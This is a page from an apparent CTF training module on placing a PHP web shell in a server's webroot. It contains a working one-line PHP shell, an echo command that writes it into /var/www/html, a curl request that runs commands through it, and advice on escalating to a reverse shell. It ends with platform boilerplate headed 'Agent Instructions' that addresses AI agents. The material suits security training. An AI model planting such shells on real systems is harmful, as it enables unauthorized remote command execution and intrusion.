> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/getting-started_mod-2/wf-web-shell.md).

# WF-Web Shell

Use this page when you already have web-based code execution, file upload, or write access to the webroot.

### Quick loop

1. Find a writable path.
2. Place the web shell.
3. Test command execution.
4. Use it to run commands.
5. Treat it as a bridge.

{% stepper %}
{% step %}

### Find the execution path

Confirm where executable web content lives.

Common webroots:

* Apache on Linux — `/var/www/html`
* Nginx — `/usr/share/nginx/html`
* XAMPP — `/htdocs`

You need both write access and script execution.
{% endstep %}

{% step %}

### Place the web shell

Write a web shell into the webroot.

Example PHP shell:

```php
<?php system($_REQUEST["cmd"]); ?>
```

Example write path:

```bash
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
```

{% endstep %}

{% step %}

### Test command execution

Access the web shell through the browser or with `curl`.

```bash
curl "http://<TARGET_HOST>/shell.php?cmd=id"
```

If the command runs, the page prints the output back to you.
{% endstep %}

{% step %}

### Use it to run commands

You can keep changing the command to get output.

Use it when:

* you gain file upload
* you have command injection or RCE in a web app
* you need a simple way to run commands through the web server
  {% endstep %}

{% step %}

### Treat it as a bridge

Use the web shell as a bridge.

It is usually less interactive than a reverse shell.

It is often best used as a stepping stone to a reverse shell or a better shell.
{% endstep %}
{% endstepper %}

### Fast decision rules

* If the script does not run, verify that you wrote it to the active webroot.
* If the shell works, use it to move to a better shell.
* If the host reboots, check whether the web shell still exists.

### Useful references

* [Getting started](/capcap/readme/ctf-modules/getting-started_mod-2.md)
* [WF-Web Enumeration](/capcap/readme/ctf-modules/getting-started_mod-2/wf-web-enumeration.md)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/getting-started_mod-2/wf-web-shell.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
